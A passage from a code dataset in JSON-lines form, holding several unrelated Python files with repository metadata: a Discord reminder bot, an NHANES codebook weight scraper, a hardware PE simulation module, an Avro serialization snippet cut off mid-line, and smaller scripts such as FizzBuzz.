op.drop_table('title_episode')\n op.drop_table('title_crew')\n op.drop_table('title_basics')\n op.drop_table('title_akas')\n op.drop_table('name_basics')\n # ### end Alembic commands ###\n\n\ndef upgrade_clickhouse() -> None:\n pass\n\n\ndef downgrade_clickhouse() -> None:\n pass\n","repo_name":"tmolcard/col-row-db","sub_path":"alembic/versions/5573c1201da3_postgres_initialize_imdb_tables.py","file_name":"5573c1201da3_postgres_initialize_imdb_tables.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6660091889","text":"import pandas as pd\nimport os, math\n\ndef read_TS(file = '/Users/steve/doe-project/reductive_reconstruction/oxide_tests/structures/pt/coupled_1.0/chg.0.lmp'):\n # read in the data file for a given timestep and convert to a dataframe\n input = open(file, 'r')\n raw_data = input.readlines()\n input.close()\n\n timestep = int(raw_data[1])\n ts_data = {'ID':[], 'Type':[], 'X':[], 'Y':[], 'Z':[], 'Q':[]}\n\n for line in raw_data[9:]:\n ld = line.split()\n #print(ld)\n ts_data['ID'].append(int(ld[0]))\n ts_data['Type'].append(int(ld[1]))\n ts_data['X'].append(float(ld[2])*33.262)\n ts_data['Y'].append(float(ld[3])*33.607)\n ts_data['Z'].append(float(ld[4])*128.632)\n ts_data['Q'].append(float(ld[5]))\n\n run_data = pd.DataFrame.from_dict(ts_data)\n run_data = run_data.sort_values(by=['ID'])\n\n return timestep, run_data\n\ndef seperate_layer(data: pd.DataFrame, types: list, zmin: float, zmax: float):\n # data = pd.Dataframe, types = list of atom ids to include, zmin/zmax = range of values for the layer\n layer = data[(data['Type'].isin(types)) & (data['Z'] > zmin) & (data['Z'] < zmax)]\n numAtoms = len(layer.ID)\n totalQ = layer['Q'].sum()\n avgQ = totalQ / numAtoms\n minQ = layer['Q'].min()\n maxQ = layer['Q'].max()\n return totalQ, avgQ, maxQ, minQ, numAtoms\n\n","repo_name":"stephen-holoviak/MD_scripts","sub_path":"read_timeStep.py","file_name":"read_timeStep.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3442149797","text":"import os\nimport sys\nimport argparse\nimport re\nimport json\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='')\n\n parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')\n parser.add_argument('-i', '--input_path', required=True, help='input path')\n parser.add_argument('-o', '--output_path', required=True, help='input path')\n\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n with open(args.output_path + '.txt', 'w') as f, open(args.output_path + '.hash', 'w') as f2:\n\n\n json_re = re.compile(r'(.*?)\\.json')\n if os.path.isdir(args.input_path):\n for root, dirs, files in os.walk(args.input_path):\n for file in files:\n file_path = os.path.join(root, file)\n match = re.match(json_re, file)\n if not match:\n continue\n hash_id = match.group(1)\n\n with open(file_path, 'r') as json_f:\n data_dict = json.load(json_f)\n f.write(data_dict['text'] + '\\n')\n f2.write(hash_id + '\\n')\n\n else:\n with open(args.input_path, 'r') as json_f:\n for line in json_f:\n data_dict = json.loads(line)\n f.write(data_dict['text'] + '\\n')\n f2.write(hash_id + '\\n')\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"cenetp/hack4oer2018_lehrplaene","sub_path":"convert_json_for_translate.py","file_name":"convert_json_for_translate.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72349247555","text":"# I know that adding \"test\" to the filename to test it is bad practice\n# I'm not a Python programmer!\n\ndef contains(string1, string2):\n \"\"\"\n Returns True if string1 contains string2\n \"\"\"\n\n if string2 in string1:\n # string2 is in string1! Return True to signify that we found it\n return True\n else:\n # string2 is not in string1, so we return False\n return False\n \ndef test_contains():\n assert contains(\"banana\", \"ana\") == True\n assert contains(\"racecar\", \"car\") == True\n \n assert contains(\"cool\", \"test\") == False\n assert contains(\"hello\", \"hi\") == False","repo_name":"SkyfallWasTaken/cs-hw","sub_path":"string_contains_test.py","file_name":"string_contains_test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11216233660","text":"#\n# [412] Fizz Buzz\n#\n# https://leetcode.com/problems/fizz-buzz/description/\n#\n# algorithms\n# Easy (58.19%)\n# Total Accepted: 107.7K\n# Total Submissions: 185.1K\n# Testcase Example: '1'\n#\n# Write a program that outputs the string representation of numbers from 1 to\n# n.\n# \n# But for multiples of three it should output “Fizz” instead of the number and\n# for the multiples of five output “Buzz”. For numbers which are multiples of\n# both three and five output “FizzBuzz”.\n# \n# Example:\n# \n# n = 15,\n# \n# Return:\n# [\n# ⁠ \"1\",\n# ⁠ \"2\",\n# ⁠ \"Fizz\",\n# ⁠ \"4\",\n# ⁠ \"Buzz\",\n# ⁠ \"Fizz\",\n# ⁠ \"7\",\n# ⁠ \"8\",\n# ⁠ \"Fizz\",\n# ⁠ \"Buzz\",\n# ⁠ \"11\",\n# ⁠ \"Fizz\",\n# ⁠ \"13\",\n# ⁠ \"14\",\n# ⁠ \"FizzBuzz\"\n# ]\n# \n# \n#\nclass Solution(object):\n def fizzBuzz(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n rs = []\n for i in range(1, n+1):\n if i % 3 == 0 and i % 5 == 0:\n rs.append(\"FizzBuzz\")\n elif i % 3 == 0:\n rs.append(\"Fizz\")\n elif i % 5 == 0:\n rs.append(\"Buzz\")\n else:\n rs.append(str(i))\n return rs\n \n","repo_name":"goalong/lc","sub_path":"v1/412.fizz-buzz.136736605.ac.py","file_name":"412.fizz-buzz.136736605.ac.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"19171333001","text":"import discord\r\nfrom discord.ext import tasks\r\nfrom datetime import datetime as dt\r\nimport datetime\r\nimport re\r\nimport json\r\nimport pickle\r\n\r\nuser = []\r\nremember = []\r\ntimeL = []\r\ndate = []\r\n\r\nintents = discord.Intents.default()\r\nintents.message_content = True\r\nclient = discord.Client(intents=intents)\r\n\r\n#get saved data from files to variables\r\nwith open('channelid.txt', 'r') as f:\r\n cid = int(f.read())\r\ntry:\r\n with open(\"user.pickle\", \"rb\") as fu:\r\n user = pickle.load(fu)\r\nexcept:\r\n with open(\"user.pickle\", \"wb\") as fu:\r\n print(\"user.pickle not found, creating file...\")\r\ntry:\r\n with open(\"remember.pickle\", \"rb\") as fr:\r\n remember = pickle.load(fr)\r\nexcept:\r\n with open(\"remember.pickle\", \"wb\") as fr:\r\n print(\"remember.pickle not found, creating file...\")\r\ntry:\r\n with open(\"timeL.pickle\", \"rb\") as ft:\r\n timeL = pickle.load(ft)\r\nexcept:\r\n with open(\"timeL.pickle\", \"wb\") as ft:\r\n print(\"timeL.pickle not found, creating file...\")\r\ntry:\r\n with open(\"date.pickle\", \"rb\") as fd:\r\n date = pickle.load(fd)\r\nexcept:\r\n with open(\"date.pickle\", \"wb\") as fd:\r\n print(\"date.pickle not found, creating file...\")\r\ntry:\r\n with open('config.json') as f:\r\n data = json.load(f)\r\n for c in data['botConfig']:\r\n print('Prefix: ' + c['prefix'])\r\n print('Token: ' + c['token'])\r\nexcept:\r\n print(\"config file not found!\")\r\n exit()\r\nprint(f\"channel id saved: {str(cid)}\")\r\n\r\n#save data to files\r\ndef updateFile():\r\n with open(\"user\", \"wb\") as fu: # Pickling\r\n pickle.dump(user, fu)\r\n with open(\"remember\", \"wb\") as fr: # Pickling\r\n pickle.dump(remember, fr)\r\n with open(\"timeL\", \"wb\") as ft: # Pickling\r\n pickle.dump(timeL, ft)\r\n with open(\"date\", \"wb\") as fd: # Pickling\r\n pickle.dump(date, fd)\r\n\r\n#convert HHam/ph time to HH:MM\r\ndef HHtoHHMM(time):\r\n if time == \"12am\":\r\n return \"00:00\"\r\n elif time == \"1am\":\r\n return \"01:00\"\r\n elif time == \"2am\":\r\n return \"02:00\"\r\n elif time == \"3am\":\r\n return \"03:00\"\r\n elif time == \"4am\":\r\n return \"04:00\"\r\n elif time == \"5am\":\r\n return \"05:00\"\r\n elif time == \"6am\":\r\n return \"06:00\"\r\n elif time == \"7am\":\r\n return \"07:00\"\r\n elif time == \"8am\":\r\n return \"08:00\"\r\n elif time == \"9am\":\r\n return \"09:00\"\r\n elif time == \"10am\":\r\n return \"10:00\"\r\n elif time == \"11am\":\r\n return \"11:00\"\r\n elif time == \"12pm\":\r\n return \"12:00\"\r\n elif time == \"1pm\":\r\n return \"13:00\"\r\n elif time == \"2pm\":\r\n return \"14:00\"\r\n elif time == \"3pm\":\r\n return \"15:00\"\r\n elif time == \"4pm\":\r\n return \"16:00\"\r\n elif time == \"5pm\":\r\n return \"17:00\"\r\n elif time == \"6pm\":\r\n return \"18:00\"\r\n elif time == \"7pm\":\r\n return \"19:00\"\r\n elif time == \"8pm\":\r\n return \"20:00\"\r\n elif time == \"9pm\":\r\n return \"21:00\"\r\n elif time == \"10pm\":\r\n return \"22:00\"\r\n elif time == \"11pm\":\r\n return \"23:00\"\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f'We have logged in as {client.user}')\r\n CheckReminders.start()\r\n TodaysReminders.start()\r\n now = dt.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n for i in timeL:\r\n print(f\"{current_time}: reminders stored for {user[timeL.index(i)]} about {remember[timeL.index(i)]} at {i}\")\r\n return\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n now = dt.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n current_date = now.strftime(\"%d\")\r\n current_month = now.strftime(\"%m\")\r\n id = \"<@\" + str(message.author.id) + \">\"\r\n if message.content.startswith(f'{c[\"prefix\"]}test'):\r\n await message.channel.send(\"I am alive\")\r\n if message.content.startswith(f'{c[\"prefix\"]}rmb'):\r\n temp = message.content.replace(\"$rmb\",\"\")\r\n breakdown = temp.split()\r\n if(breakdown[-1] != None):\r\n if breakdown[-1].lower() == \"today\":\r\n date.append(now.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() == \"tmr\":\r\n dd = int(current_date) + 1\r\n dd = str(dd).zfill(2)\r\n mm = current_month\r\n dd = (dd + \"/\" + mm)\r\n date.append(dd)\r\n elif breakdown[-1].lower() ==\"monday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((0 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"tuesday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((1 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"wednesday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((2 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"thursday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((3 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"friday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((4 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"saturday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((5 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"sunday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((6 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n else:\r\n date.append(now.strftime(\"%d/%m\"))\r\n time = re.search(\"([0-1]?[0-9]|2[0-3]):[0-5][0-9]\",temp)\r\n if(time != None):\r\n temp = temp.replace(time.group(), \"\").rstrip()\r\n user.append(id)\r\n remember.append(temp)\r\n timeL.append(time.group())\r\n print(user[-1], remember[-1], timeL[-1])\r\n await message.channel.send(f\"{id}I will remind you about{temp} at {time.group()}\")\r\n time = re.search(\"([0-9]|1[0-2])([AaPp][Mm])\",temp)\r\n if (time != None):\r\n temp = temp.replace(time.group(), \"\").rstrip()\r\n time = str(time.group())\r\n print(time)\r\n time = HHtoHHMM(time.lower())\r\n print(time)\r\n user.append(id)\r\n remember.append(temp)\r\n timeL.append(time)\r\n print(f\"{current_time}: reminder added for {id} about {temp} at {time}\")\r\n await message.channel.send(f\"{id}I will remind you about {temp} at {time}\")\r\n updateFile()\r\n return\r\n if message.content.startswith(f'{c[\"prefix\"]}clearall'):\r\n for i in timeL:\r\n del user[timeL.index(i)]\r\n del remember[timeL.index(i)]\r\n del date[timeL.index(i)]\r\n del timeL[timeL.index(i)]\r\n updateFile()\r\n await message.channel.send(f\"{id}, all reminders cleared!\")\r\n if message.content.startswith(f'{c[\"prefix\"]}showall'):\r\n await message.channel.send(f\"{id}, reminders you have are:\")\r\n for i in timeL:\r\n print(f\"{current_time}: reminders stored for {user[timeL.index(i)]} about {remember[timeL.index(i)]} at {i}\")\r\n await message.channel.send(f\"{user[timeL.index(i)]}, reminders about {remember[timeL.index(i)]} at {i} {date[timeL.index(i)]}\")\r\n if message.content.startswith(f'{c[\"prefix\"]}here'):\r\n channelid = message.channel.id\r\n with open('channelid.txt', 'w') as f:\r\n f.write(str(channelid))\r\n await message.channel.send(f\"{id}, I will announce reminders in this channel now\")\r\n#check for reminders every second\r\n@tasks.loop(seconds=1)\r\nasync def CheckReminders():\r\n BotChannel = client.get_channel(cid)\r\n now = dt.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n current_date = now.strftime(\"%d/%m\")\r\n for x in date:\r\n if current_date == x:\r\n for i in timeL:\r\n if current_time == i:\r\n print(f\"{current_time}: annoucing reminder for {user[timeL.index(i)]} about {remember[timeL.index(i)]}\")\r\n await BotChannel.send(f\"{user[timeL.index(i)]}, reminder about {remember[timeL.index(i)]}\")\r\n del user[timeL.index(i)]\r\n del remember[timeL.index(i)]\r\n del date[timeL.index(i)]\r\n del timeL[timeL.index(i)]\r\n updateFile()\r\n#announce reminders for today at midnight\r\n@tasks.loop(minutes=1)\r\nasync def TodaysReminders():\r\n BotChannel = client.get_channel(cid)\r\n now = dt.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n current_date = now.strftime(\"%d/%m\")\r\n print(f\"{current_time} checking for reminders today\")\r\n for x in date:\r\n if current_date == x:\r\n for i in timeL:\r\n if current_time == i:\r\n print(\r\n f\"{current_time}: annoucing reminder for {user[timeL.index(i)]} about {remember[timeL.index(i)]}\")\r\n await BotChannel.send(f\"{user[timeL.index(i)]}, reminder about {remember[timeL.index(i)]}\")\r\n\r\nclient.run(c['token'])","repo_name":"ruodeee/Simple-Reminder-bot-discord-bot","sub_path":"Reminder_bot.py","file_name":"Reminder_bot.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72317613635","text":"# -*- coding: utf-8 -*-\n\n# basic setup class types\nfrom nnsim.module import Module, ModuleList\nfrom nnsim.nnsimChannel import Channel as Ch\nfrom nnsim.nnsimRecorder import nnsimRecorder\n\n# class types depending on the model\nfrom arithmetic import mac\nfrom sp import WeightsSP\n\n# ======================================================================= \n# 1. there are three types of scratchpad memory: weights, ifmap, psum\n# 2. each scrachpad has only one bank \n# 3. there is only one MAC in the PE\n# ======================================================================= \n\nclass PE(Module):\n \n def instantiate(self, setup):\n \n self.class_name = 'PE'\n self.row = setup['row']\n self.col = setup['col']\n self.debug = 'PE[' + str(self.row) + ']' + '[' + str(self.col) + ']'\n \n # ================================================================\n # Stats Related Setup \n # ================================================================\n self.component_class_specification_stats = 'hide'\n self.component_specification_stats = 'show'\n self.access_counts_stats = 'show'\n self.recorder = nnsimRecorder()\\\n if self.traces_stats == 'show'\\\n else None\n # =================================================================\n # IO Channels\n # =================================================================\n self.weights_data_in_chn = ModuleList(setup['weights_data_in_chn'])\n self.ifmap_data_in_chn = ModuleList(setup['ifmap_data_in_chn'])\n self.psum_data_in_chn = ModuleList(setup['psum_data_in_chn'])\n self.psum_data_out_chn = ModuleList(setup['psum_data_out_chn'])\n \n # =================================================================\n # Hardware components \n # =================================================================\n # >>>> weights scratchpad (reg)\n self.weights_reader = ModuleList(Ch())\n weights_sp_setup = {'fill_data_ichns': self.weights_data_in_chn,\\\n 'drain_data_ochns': self.weights_reader,\\\n 'num_logical_managers': 1,\\\n 'SRAM': {'depth': setup['wsp_depth'],\\\n 'width': setup['wsp_width'],\\\n 'data_width': setup['wsp_data_width'],\\\n 'nports': setup['wsp_nports'],\\\n 'nbanks': setup['wsp_nbanks'], \\\n 'port_type': setup['wsp_port_type']},\\\n 'debug': self.debug + '_weights_sp'}\n \n self.weight_sp = WeightsSP(weights_sp_setup)\n \n \n # >>>> mac unit\n mac_setup = {'opa_chn': self.ifmap_data_in_chn[0],\\\n 'opb_chn': self.weights_reader[0], \\\n 'opc_chn': self.psum_data_in_chn[0],\\\n 'result_chn': self.psum_data_out_chn[0],\\\n 'latency': setup['mac_latency'],\\\n 'debug': self.debug} \n \n self.mac = mac(mac_setup)\n \n \n def configure(self, config):\n weights_sp_config = config['WeightsSp']\n weights_sp_config['shape_mapping_info'] = config['shape_mapping_info']\n self.weight_sp.configure(weights_sp_config)\n \n self.clk_gated = config['clk_gated']\n self.mac.configure({'clk_gated': self.clk_gated})\n \n\n\n \n \n ","repo_name":"emma-mens/dl-hardware-project","sub_path":"designs/ws_chip/model/pe.py","file_name":"pe.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15795264642","text":"import sys, os, csv, codecs, re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom xml.dom.minidom import parseString\n\ndef load_components():\n ifile = open('components', 'r')\n components = []\n for line in ifile.readlines():\n line = line.strip()\n if line == \"\" or line[0] == \"#\": continue\n parts = line.split()\n if len(parts) == 2:\n comp_name = parts[0]\n components.append(comp_name)\n ifile.close()\n return components\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef clean_xml_string(str):\n # Removing EOL characters \n str = str.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n # Removing less/greater signs to avoid problems with XML \n str = str.replace(\"<=\", \"less or equal than\").replace(\">=\", \"greater or equal than\")\n str = str.replace(\"<\", \"less than \").replace(\">\", \"greater than\")\n # Likewise for the '&' character\n str = str.replace(\"&\", \"and\")\n # Removing the \":\" and \";\" characters, used to separate the data values\n str = str.replace(\";\", \"\").replace(\":\", \"\")\n return str\n\ndef int_or_float(datafile, name):\n file = open(datafile, 'r', encoding='latin1') \n reader = csv.reader(file, delimiter=',', quotechar='\"')\n # The replace is needed because the variable names in the source csv files\n # use \".\" instead of \"_\" even though the variable name in the codebook has\n # \"_\" \n title = [x.upper().replace(\".\", \"_\") for x in next(reader)]\n if not name in title:\n file.close()\n return None \n col = title.index(name) \n type = \"integer\" \n for row in reader:\n dat = row[col] \n try:\n value = float(dat)\n if not value.is_integer():\n type = \"float\"\n except ValueError:\n # invalid numeric value, this will be catched when checking metadata \n continue\n file.close()\n return type\n \ndef get_variable_type_and_range(short_name, full_name, table, datafile):\n var_type = None\n var_range = None\n val_list = table.tbody.find_all(\"tr\")\n for val in val_list:\n td_list = val.find_all(\"td\")\n val_code = td_list[0].text\n val_desc = td_list[1].text\n if val_desc == \"Range of Values\" or (is_number(val_code) and val_desc == val_code and var_type == None):\n if -1 < val_code.find(\" to \"): \n var_range = val_code.replace(\" to \", \",\")\n else:\n # Single value?\n var_range = val_code + \",\" + val_code\n print(\" Warning: range of numeric variable \" + short_name + \" has a single value \" + val_code)\n if var_range == \"00:00,23:59\" or -1 < full_name.find(\"HH:MM\") or -1 < full_name.find(\"HHMM\"):\n var_type = \"time\" \n else:\n if -1 < var_range.find(\".\"):\n # If the range contains a decimal point, we know is a float value\n var_type = \"float\"\n else:\n # Otherwise we need to go through the data\n # Send to a function that checks for integer or float which returns \"integer\" or \"float\"\n # then var_type = the returned value\n if os.path.exists(datafile):\n var_type = int_or_float(datafile, short_name) \n else:\n # Data file doesn't exist, variable won't be added because its type\n # will remain undefined.\n break \n elif val_desc == \"Value was recorded\" or (var_type == None and (val_desc.find(\"<\") == 0 or val_desc.isdigit())):\n var_type = \"recorded\"\n var_range = \"\" \n break \n else:\n if var_type == None: \n var_type = \"category\" \n if val_code != \".\" and val_desc != \"Missing\":\n if var_range == None: var_range = \"\" \n \n val_desc = clean_xml_string(val_desc)\n\t\t\t\t\t\t\n if var_type != \"integer\":\n if var_range != \"\" : var_range += \";\"\n var_range += val_code + \":\" + val_desc \n else:\n # Expanding the range when there is an additional cap value\n expand = 0\n\n try:\n endpoints = [int(x) for x in var_range.split(\",\")]\n except ValueError:\n endpoints = [] \n\n if len(endpoints) == 2:\n val = int(val_code) \n if val == endpoints[1] + 1: \n endpoints[1] = val\n expand = 1\n if val == endpoints[0] - 1: \n endpoints[0] = val\n expand = 1\n\n if expand: \n var_range = str(endpoints[0]) + \",\" + str(endpoints[1]) \n else:\n var_range += \";\" + val_code + \":\" + val_desc\n\n return [var_type, var_range] \n\ndef write_xml_line(line):\n xml_file.write(line + '\\n')\n xml_strings.append(line + '\\n')\n\ndef get_component_weights(component, year, parser):\n request_url = \"http://wwwn.cdc.gov/nchs/nhanes/search/datapage.aspx?Component=\" + component + \"&CycleBeginYear=\" + year\n html_doc = None\n for i in range(0, 5):\n try:\n html_doc = requests.get(request_url)\n break; \n except:\n html_doc = None \n if i < 5 - 1: print(\" Warning: Could not open \" + request_url + \", will try again\")\n if html_doc == None:\n sys.stderr.write(\"Error: Failed opening \" + request_url + \" after 5 attempts\\n\")\n sys.exit(1)\n \n html_soup = BeautifulSoup(html_doc.text, parser)\n \n if component == \"Demographics\":\n subsample_weight = '\"no\"'\n else:\n subsample_weight = '\"yes\"'\n \n # Getting all the codebooks in listed in the datapage\n for table in html_soup.find_all('table'): \n links = table.find_all('a')\n for link in links:\n codebook_url = link['href']\n \n path, ext = os.path.splitext(codebook_url)\n if ext.lower() == \".htm\" or ext.lower() == \".html\":\n \n codebook_url = base_url + codebook_url\n print(codebook_url)\n\n codebook_doc = None\n for i in range(0, 5):\n try:\n codebook_doc = requests.get(codebook_url)\n break; \n except:\n codebook_doc = None \n if i < 5 - 1: print(\" Warning: Could not open \" + codebook_url + \", will try again\")\n if codebook_doc == None:\n sys.stderr.write(\"Error: Failed opening \" + codebook_url + \"after 5 attempts\\n\")\n sys.exit(1)\n \n print(\"Extracting metadata from codebook \" + codebook_url + \"...\")\n codebook_soup = BeautifulSoup(codebook_doc.text, parser)\n\n header = codebook_soup.find(\"div\", {\"id\": \"PageHeader\"}) \n if header == None: continue\n \n header_table_name = header.find(\"h3\") \n table_name = header_table_name.contents[0].strip().replace(\"&\", \"and\")\n \n header_data_file = header.find(\"h4\") \n data_file = header_data_file.contents[0].split(\":\")[1].strip()\n data_filename = os.path.splitext(data_file)[0].upper()\n csv_data_filepath = os.path.abspath(os.path.join(data_folder, data_filename + \".csv\"))\n csv_data_relpath = os.path.join(data_folder, data_filename + \".csv\")\n\n codebook = codebook_soup.find(\"div\", {\"id\": \"Codebook\"})\n if codebook == None: continue\n variables = codebook.find_all(\"div\", {\"class\": \"pagebreak\"})\n \n has_seqn = False\n xml_lines = []\n table_vars = [] \n for var in variables:\n var_info = var.find(\"dl\")\n if not var_info: \n print(\" Warning: codebook for '\" + str(var) + \"' seems malformed, skipping\")\n continue\n var_table = var.find(\"table\")\n info = var_info.find_all(\"dd\")\n \n if 0 < len(info):\n short_name = clean_xml_string(info[0].contents[0]).upper()\n else:\n print(\" Warning: variable without short name, skipping\")\n continue\n \n short_name = short_name.strip()\n if short_name == \"\":\n print(\" Warning: variable without short name, skipping\")\n continue\n \n if short_name == \"SEQN\":\n has_seqn = True\n \n full_name = \"\"\n if 1 < len(info) and 0 < len(info[1].contents):\n # Trying to get full name from SAS label\n full_name = clean_xml_string(info[1].contents[0])\n \n full_name = full_name.strip()\n if full_name == \"\": \n print(\" Warning: variable \" + short_name + \" doesn't have full name, skipping\")\n continue \n\n fnl = full_name.lower()\n if -1 < fnl.find(\"weight\") and (-1 < fnl.find(\"interview\") or -1 < fnl.find(\"mec\") or -1 < fnl.find(\"sample\") or -1 < fnl.find(\"environmental\")):\n include_weight = '\"yes\"'\n if -1 < fnl.find(\"jack knife\"):\n include_weight = '\"no\"'\n \n if var_table == None:\n print(\" Warning: variable \" + full_name + \" (\" + short_name + \") doesn't have a value table, skipping\")\n continue\n \n (var_type, var_range) = get_variable_type_and_range(short_name, full_name, var_table, csv_data_filepath)\n \n if var_type != \"float\":\n print(\" Warning: wrong type for weight variable \" + full_name + \" (\" + short_name + \")\")\n continue\n \n if var_range == None:\n print(\" Warning: Cannot find type/range for weight variable \" + full_name + \" (\" + short_name + \")\")\n continue \n \n weight_vars.append(short_name)\n if not short_name in sample_weights:\n name_ext = os.path.split(csv_data_relpath)[1]\n tname = name_ext.split(\".\")[0]\n short_name = short_name + \".\" + tname\n \n xml_lines.append(' ' + short_name + '' + full_name + '' + var_type + '' + var_range + '' + csv_data_relpath + '')\n \n if has_seqn:\n if component == \"Demographics\":\n for line in xml_lines: sample_xml_lines.append(line)\n elif component == \"Dietary\": \n for line in xml_lines: dietary_xml_lines.append(line)\n else:\n for line in xml_lines: subsample_xml_lines.append(line) \n elif table_vars: \n print(\" Warning: SEQN variable not found in this table (\" + table_name + \"), skipping weights variables \" + table_vars)\n \n \nbase_url = \"https://wwwn.cdc.gov\"\n\ndata_cycle = sys.argv[1] \ndata_folder = sys.argv[2]\nxml_filename = sys.argv[3]\n\nhtml_parser = \"html.parser\"\nif len(sys.argv) == 6 and sys.argv[4] == \"-parser\":\n html_parser = sys.argv[5] \n\ndata_components = load_components()\nbegin_year = data_cycle.split(\"-\")[0]\n\nsample_weights = [\"WTINT2YR\", \"WTMEC2YR\", \"WTINT4YR\", \"WTMEC4YR\"]\nweight_vars = []\nsample_xml_lines = []\ndietary_xml_lines = []\nsubsample_xml_lines = []\n\nfor component in data_components:\n get_component_weights(component, begin_year, html_parser)\n \n# Writing file in utf-8 because the input html files from\n# NHANES website sometimes have characters output the ASCII range.\nxml_file = codecs.open(xml_filename, \"w\", \"utf-8\")\nxml_strings = []\n\nwrite_xml_line('')\nwrite_xml_line('')\n \nif sample_xml_lines: \n write_xml_line(' ') \n for line in sample_xml_lines: write_xml_line(line)\n write_xml_line('
')\n\nif dietary_xml_lines:\n write_xml_line(' ') \n for line in dietary_xml_lines: write_xml_line(line)\n write_xml_line('
')\n \nif subsample_xml_lines: \n write_xml_line(' ') \n for line in subsample_xml_lines: write_xml_line(line)\n write_xml_line('
')\n\nwrite_xml_line('
')\nxml_file.close()\n\n# For XML validation.\ntry:\n doc = parseString(''.join(xml_strings))\n doc.toxml()\n print(\"Done.\")\nexcept:\n sys.stderr.write(\"XML validation error:\\n\")\n raise\n","repo_name":"mirador/nhanes","sub_path":"getweights.py","file_name":"getweights.py","file_ext":"py","file_size_in_byte":14223,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"7725307614","text":"import io\nimport json\nimport avro.schema\nfrom avro.io import BinaryDecoder, DatumReader, DatumWriter, BinaryEncoder\nfrom pyspark import SparkContext, SparkConf\n\nschema_str = \"{\\\"namespace\\\":\\\"com.ey.cust\\\",\\\"type\\\":\\\"record\\\",\\\"name\\\":\\\"Customer\\\",\\\"fields\\\":[{\\\"name\\\":\\\"consumerId\\\",\\\"type\\\":[\\\"null\\\",\\\"string\\\"],\\\"default\\\":null},{\\\"name\\\":\\\"customerName\\\",\\\"type\\\":\\\"string\\\"},{\\\"name\\\":\\\"customerZip\\\",\\\"type\\\":\\\"string\\\"}]}\"\npayload_str = \"{\\\"consumerId\\\": \\\"A00AD3\\\", \\\"customerName\\\": \\\"Charlie\\\", \\\"customerZip\\\": \\\"fdsfd\\\"}\"\n\n\ndef deserialize_avro(binary_data, schema):\n \"\"\"\n Function used to deserialize an avro binary data\n :param schema: avro schema of binary data\n :param binary_data: event data in binary encoded (bytes)\n :return: deserialized data and corresponding schema\n \"\"\"\n bytes_reader = io.BytesIO(binary_data)\n decoder = BinaryDecoder(bytes_reader)\n reader = DatumReader(schema)\n data = reader.read(decoder)\n return data, schema\n\n\ndef serialize_avro(payload_str, schema):\n \"\"\"\n Function used to serialize a json event to binary format based on avro schema\n :param schema: avro schema of payload\n :param payload_str: event data in json string format\n :return: avro serialized binary data and corresponding schema\n \"\"\"\n payload_json = json.loads(payload_str)\n writer = DatumWriter(schema)\n bytes_writer = io.BytesIO()\n encoder = BinaryEncoder(bytes_writer)\n writer.write(payload_json, encoder)\n raw_bytes = bytes_writer.getvalue()\n return raw_bytes, schema\n\n\navro_schema = avro.schema.parse(schema_str)\nconf = SparkConf()\nconf.setAppName('test_pyspark')\nconf.set(\"spark.driver.host\", \"127.0.0.1\")\nsc = SparkContext(conf=conf)\narr = (sc.parallelize([(payload_str, avro_schema)])\n .map(lambda payload_schema_pair: serialize_avro(payload_schema_pair[0], payload_schema_pair[1]))\n .map(lambda bytes_schema_pair: deserialize_avro(bytes_schema_pair[0], bytes_schema_pair[1]))\n 